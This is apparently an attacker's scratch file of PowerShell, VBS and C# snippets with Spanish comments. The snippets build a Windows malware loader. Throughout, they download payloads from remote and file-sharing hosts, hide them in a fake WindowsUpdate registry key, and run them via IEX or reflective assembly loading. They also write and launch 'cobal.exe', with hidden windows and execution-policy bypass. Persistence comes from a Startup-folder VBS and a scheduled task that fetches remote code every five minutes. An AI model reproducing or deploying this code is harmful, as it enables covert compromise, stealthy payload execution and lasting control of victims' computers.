$CARGA = (New-Object Net.WebClient).DownloadString('')
New-Item -Path HKCU:\SOFTWARE\Wow6432Node\Microsoft\WindowsUpdate -Value $CARGA

#################################################################

$dl = (New-Object Net.WebClient).DownloadString('http://192.168.0.10:7070/rg.png')
New-Item -Path HKCU:\software\wow6432node\Microsoft\WindowsUpdate -Value $dl

$value = Get-ItemProperty -Path HKCU:\software\wow6432node\Microsoft\WindowsUpdate -Name "(Default)"

IEX ($value."(Default)")

----------------
$proceso = @"
Dim shell,command
command = "pow" & "ershell -windo 1 -noexit -exec bypass -file ""C:\Users\Public\Nod.ps1"""
Set shell = CreateObject("WScript.Shell")
shell.Run command,0
"@
$p = 'C:\Users\' + $env:UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
$proceso | Out-File c:\windows\temp\Update.vbs -Encoding ascii
Copy-Item -Path c:\windows\temp\Update.vbs -Destination $p  -Force; Invoke-Item  c:\windows\temp\Update.vbs

$proceso2 = @"
 function HOMERO(){
`$web = New-Object Net.WebClient;
`$string = `$web.Downloadstring('http://192.168.0.4:7070/b64.txt')
`$assembly = [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String(-join `$string[-1..-`$string.Length]));
`$methodInfo = `$assembly.EntryPoint;
`$create = `$assembly.CreateInstance(`$methodInfo.Name);
`$methodInfo.Invoke(`$500000000,`$500000000);
}
HOMERO
"@
$proceso2 | Out-File C:\Users\Public\Nod.ps1 -Encoding ascii
---------------------

$value = Get-ItemProperty -Path HKCU:\software\wow6432node\Microsoft\WindowsUpdate -Name "(Default)"
#Start-Sleep -s 5

$VARR = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String(($value."(Default)")))
$Image = $env:PUBLIC + '\cobal.exe'
[byte[]]$Bytes = [convert]::FromBase64String($VARR)

start-sleep -s 3
[System.IO.File]::WriteAllBytes($Image,$Bytes)
start-sleep -s 3
start $Image 

#powershell -noexit -enc  ($value."(Default)")

---------------------

Powershell C#

$CODIGO=@"

using System;
using System.Net;
namespace Helloword
{

     public static class Hello{
     public static void Main(){
WebClient client = new WebClient ();
string reply = client.DownloadString ("ip/1.txt");
 
Object f= AppDomain.CurrentDomain.Load(Convert.FromBase64String(ReverseString(reply))).EntryPoint.Invoke(null,null);

       }
       
public static string ReverseString(string s)
       {
            char[] arr = s.ToCharArray();
            Array.Reverse(arr);
            return new string(arr);
       }
    }
}

"@

Codif in base64 UTF la funcion

powershell -wind 1 -noexit -exec bypass -enc eeeeeewereara         or -file ""c:\windows\1.ps1!!

---------------------
Persistencia
start-process -windowstyle hidden schtasks '/change /tn AI /disable';
$appdata_fullpath = $env:userprofile+'\AppData\Roaming'; 
$comp_uuid = (Get-WmiObject Win32_ComputerSystemProduct).UUID; 
$uuid_substr = $comp_uuid.Substring(0,6); 
$ps_folder = $appdata_fullpath+'\'+$uuid_substr;
If(test-path $ps_folder"\_in"){break;break;break;}; 
If(!(test-path $ps_folder)){New-Item -ItemType Directory -Force -Path $ps_folder}; 
"start-process -windowstyle hidden powershell.exe "" -c iex ((New-Object ('Net.Webclient')).('DownloadString').invoke(('https://<redacted>/jola/mula')))""" | out-file $ps_folder\XFoXp1UwJ5uzuUNrYbe.ps1; 
$task_command=' /F /create /sc minute /mo 5 /TN "AppRunLog" /ST 07:00 /TR "powershell.exe -windowstyle hidden -exe bypass -file '+$ps_folder+'\XFoXp1UwJ5uzuUNrYbe.ps1 "'; 
start-process -windowstyle hidden schtasks $task_command;

-------------------------------------
$dl = (New-Object Net.WebClient).DownloadString('https://www.upload.ee/download/11864498/440d5dee7d9517698ec3/ss.txt')

New-Item -Path HKCU:\software\wow6432node\Microsoft\WindowsUpdatek -Value $dl 


$value = Get-ItemProperty -Path HKCU:\software\wow6432node\Microsoft\WindowsUpdatek -Name "(Default)"
#Start-Sleep -s 5
function HexToString($i) {
    $r = ""
    for ($n = 0; $n -lt $i.Length; $n += 2)
        {$r += [char][int]("0x" + $i.Substring($n,2))}
    return $r
    }
    $aa = HexToString ($value."(Default)")
    
 codifc function to utf8
    
 powershell -noexit -enc $aa
-- -----------------------------------------
escribe un exe en el disco
$STRING = "PAYLOAD"
$STRING.Replace("#","A")
$Image = $env:PUBLIC + '\cobal.exe'
[byte[]]$Bytes = [convert]::FromBase64String($STRING)  
[System.IO.File]::WriteAllBytes($Image,$Bytes)
start-sleep -s 3
Invoke-Item $Image
  
-----------------------------------------------

AES-FILE.PS1
TE CIFRA EL EXE AES Y TE DA UNA LLAVE
CUANDO PEGAS EL CODIGO ACORDARSE NO DEJAR ESPACIOS









